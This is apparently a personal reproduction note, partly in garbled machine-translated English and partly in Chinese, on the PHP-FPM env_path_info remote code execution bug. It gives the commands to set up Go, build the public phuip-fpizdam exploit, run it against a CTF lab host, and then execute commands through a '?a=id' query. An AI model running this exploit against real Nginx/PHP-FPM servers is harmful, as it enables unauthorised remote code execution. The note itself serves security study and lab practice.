1 Overview
Mainly due to lower env_path_info vulnerability in PHP-FPM in sapi / fpm / fpm / fpm_main.c file overflow cause an attacker can use line breaks% 0a damage Nginx in fastcgi_split_path_info corresponding regular expression, resulting in PATH_INFO passed to the PHP-FPM is empty, triggering the vulnerability, the URL request by sending a special, in some special configuration will result in arbitrary code execution
2. reproduction environment (since exp required environmental compiled languages go, so go the locale configuration honestly it)
1) Download the installation package go Language
wget https://studygolang.com/dl/golang/go1.10.3.linux-amd64.tar.gz
2) to extract the specified directory / usr / local / lower
root@Mke:/usr/local# tar -C /usr/local -xzf go1.10.3.linux-amd64.tar.gz
3) At the end of / etc / profile plus word
vim / etc / Profile
##### This sentence, adding environment variables go language, global call to
Export the PATH = $ the PATH: / usr / local / go / bin
4) so that the configuration takes effect then
source /etc/profile
Go look locale
perfect
3. Download Kit (exp)
go get github.com/neex/phuip-fpizdam ####下载完成后会在当前目录下生成一个go目录 cd go/src/ ####切换到这个目录下,编译go源码 go build github.com/neex/phuip-fpizdam ####编译完成会生成一个phuip-fpizdam文件
4.测试漏洞
靶机:http://613-d9f884cd-dfd6-4afa-985b-5a215d575ad9node3.buuoj.cn:26779/index.php
注:漏洞环境懒得搭,所以用buuctf的漏洞环境作为靶场(嗯,赵师傅NB!!!)
攻击步骤嘛
./phuip-fpizdam 目标地址/index.php
访问·一下目标地址
查看一下当前权限
http://613-d9f884cd-dfd6-4afa-985b-5a215d575ad9node3.buuoj.cn:26779/index.php?a=id
复现基本结束
菜鸡笔记—-2020-1-14
末尾送个彩蛋,参数a=env即可Get Flag ,/笑